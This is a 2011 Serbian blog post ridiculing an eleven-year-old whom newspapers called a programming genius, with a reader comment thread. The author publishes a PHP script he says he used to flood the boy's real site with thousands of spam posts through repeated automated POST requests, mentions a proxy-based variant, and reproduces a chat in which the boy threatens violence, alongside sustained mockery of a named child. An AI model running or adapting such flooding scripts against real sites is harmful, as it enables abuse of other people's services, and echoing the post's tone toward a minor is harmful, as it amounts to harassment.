Monday, August 22, 2011

Jedanaestogodišnji "genije"

Pre neki dan sam na Blogu novina Blic pročitao nešto veoma zanimljivo i odmah pomislio da ta vest neće imati nikakvog odziva u ovoj državi, ali sam se prevario. Reč je o ovom članku. Več sledećeg dana ja sam tu vest video na još više mesta i stvarno se zabrinuo da će ljudi stvarno poverovati da smo dobili novog genija iako je u pitanju bio samo dečak koji je poznavao nekog urednika ili je novinar jednostavno digitalno neobrazovan kada tako nešto samtra genijalnim.
Kasnije sam sav zainteresovan posetio i njegov "sajt"
, ako se ta jedna iskopirana strana može nazvati sajtom i oko mi je privukao portofolio deo. Naravno prepun slika i linkova. Nakon temeljnog pregledanja tog bloga ja sam utvrdio da su sve i ti sajtovi zapravo kopije postojećih sa samo izmenjenim tekstom. Tu se našao i sajt lajkuj.us.to za koji sam kasnije čuo da je bio i SQLi (SQL Injection - vrsta napada koja menja sadržaj SQL upita za čitanje podataka iz baze i na taj način može da pročita podatke kao što su korisnička imena i passwordi) vunerable, a i XSS (Cross Site Scripting - omogućava dugotrajno ili kratkotrajno menjanje HTML koda strane što omogućava hakeru dodavanje raznog sadržaja) vunerable do skora. Nažalost te greške su ispravljene nakoh hakerskih intervencija ljudi koji su korisnici Security foruma kao što su ljuska.org i x0rg.org, ali sam ja uspeo da nadjem to da sajt nema anti-spam protekciju i uspeo sam da upišem 10000 strana statusa i to ovom jednostavnom skriptom koju sam sam napisao
<?php

$url = 'http://lajkuj.us.to/novi.php';
if(isset($_GET["p"])){
$fields = array(
'status'=>urlencode($_GET["p"]),
'submit'=>urlencode("Objavi")
);
}
else
{
$fields = array(
'status'=>urlencode("Toliko o antispam sigurnosti. "),
'submit'=>urlencode("Objavi")
);
}

//url-ify the data for the POST
foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
rtrim($fields_string,'&');

//open connection
$ch = curl_init();

//set the url, number of POST vars, POST data
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_POST,count($fields));
curl_setopt($ch,CURLOPT_POSTFIELDS,$fields_string);

//execute post

for ($i = 1; $i <= 100; $i++) {
$result = curl_exec($ch);
}

//close connection
curl_close($ch);
if(isset($_GET["p"])){
?>
<script type="text/javascript">
<!--
window.location = "./index.php?p=<?php
echo $_GET["p"];
?>"
//-->
</script>
<?php
}
else
{
?>
<script type="text/javascript">
<!--
window.location = "./index.php"
//-->
</script>
<?php
}
?>

Nažalost taj objavljeni kod više ne funkcioniše pošto je zabranjena objava dvaput u minuti, a i taj jedan put ide na aprrove. A evo i kako je mali tražio da mu neko nepiše skriptu za blokiranje: http://www.mycity.rs/PHP/ddos-napad-i-spam.html Moj drug je medjutim na brzinu napisao skriptu koja radi isto što i ova moja s tom rezlikom da koristi porxy listu.
Da bude još gore ja sam utvrsio da je njegov link za skjracivanje linkova takodje ukraden u cemu govore i velike razlike u delovima CSS koda što me navodi na pomisao da su kod pisala dva programera ili ga je neko samo površinski menjao.
Mislim da će dalji sadržaj vama pokazati da je ovo dete veoma bezobrazno:



A evo i dokaza da mali ima mnogo bolji komp:

Nažalost on je pobrisao snimke i pokusaću da ih vratim.
A evo i istorije četa nakon što sam mu pokazao ovaj kod, a on meni rekao da sam bio na RTS-u:


[Милан Крагујевић]
Пријави · 10:39pm
nisi valjda dobio alchajmerovu?
[Ти]
Пријави · 10:39pm
nisam
al tebe verovatno neko udario u glavu
ćuti
ne znaš da blokiraš običan spam napad
sad ti uopšte ne radi sajt
samo izbacuje ono
"Server nije u funkciji, dodjite malo kasnije"
samo da si promenio ime php fajla
i da si promenio action atribut u form-i
[Милан Крагујевић]
Пријави · 10:41pm
pa vidiš pamentnjakoviću moji mili, toliko si glup da veruješ na-običnijoj poruci koja je tu da zavara glupe kao ti
a platiću nekom lepo da ode u **** ******* * / ** i da te isprebija na mrtvo, rugobice moja ružna

Nažalost on se pojavio i na TV-u:

Evo šta je napisao jedan jako pametan čovek (Geomaster):
Ovo već postaje smešno. Mali nema nikakvog osnova za bilo kakvu tužbu, a pretnje su smešne u najmanju ruku (kao i one tipa "platiću nekom da ti dođe tamo i tamo i izbije te"). 

Drugo, arogantan je i previše, pa makar i 200x imao 11 godina, zato što misli da zna sve što se o programiranju može naučiti. Neko mu je napumpao glavu glupostima da je novi Tesla pa se on ponaša u skladu sa tim.
Boli me k* što svi ovde pričaju da se kritikovanjem spuštamo na njegov nivo, ja jednostavno više ne mogu da ćutim kad vidim šta se dešava u Srbiji, posebno kad je programiranje u pitanju.
Za prave umove niko ne zna dok se neki kao ovaj mali probijaju kao veliki "znalci". Pogledajte sekciju Programiranja na ovom forumu - ima gomila ljudi koji itekako zaslužuju da se o njima zna (i pritom ne mislim na sebe pošto sam ja zasad početnik) a ne neki klinac koji je pokrao dizajnove i ponaša se kao omnipotentan, još će on da "tuži" nekoga, no comment...
Tužno je to što je možda mogao da bude i jako dobar klinja sa jako dobrim znanjem koje će postepeno usavršavati, međutim neko mu je rekao da je on genijalac i on je u to odmah poverovao, još i naslovna strana u novinama i TV = collapse. Neću da kritikujem nikoga, ni njegove roditelje ni bilo koga zato što ne znam ko su, ali mislim da je sa njim trebalo drugačije postupati.
Meni je drago kad vidim mlade umove koji znaju i traže usavršavanje, ali ne kada se ponašaju ovako arogantno i nadmeno.

Korisni linkovi:
Blic Online | Osnovac pravi aplikacije za Fejsbuk, sajtove, ima blog...
Domain Whois - Njegovi podaci

7 comments:

Ivan Stojmenovic said...

brate svaka cast mali je poceo na ES da mi prosipa pamet koji ima 11 godina a ja duplo vise radnog iskustva u programiranju od njegovih godina...

Sacuvaj boze

Ivan Stojmenovic said...
This comment has been removed by the author.
Ivan Stojmenovic said...

Ajde pokusaj da vratis one klipo, bas me zanima sta je objavljivao to sto je sa ES!!!

Nemanjan00 said...

Ma vređao je članove ES-a. Zajebavao ih po redu.

Stefan Stankovic said...

Na blogu pise kako jedva sastavlja kraj sa krajem, a sada hoce da "plati" nekog da isprebija nekog drugog. Klinac je mng prs'o.

Ivan Stojmenovic said...

bash me cudi kako je stigao do tog staduma da izadje na TV??? jbt ja imam radnog staza u programiranju koliko on godina i kao klinac sam pravio razna cuda sa 16 god sam prvi put u to vreme sklepao CMS i nista... A vidi ovo sacuvaj boze.... Nekada mi i krivo ali bole me uvo ajde da mali nesto zna nego nema pojma... Jbt napravio APP za FB? Mislim to prave i deca sa 5 godina uz YT tutore... Ma necu da se nerviram samo nezelim da ga vidim vise ide mi racku

Sasa said...

Interesantno da klinac brise ne samo video sa youtube koje drugi linkuju vec i strane na svom sajtu koje drugi pomenu kad ga kritikuju...

Post a Comment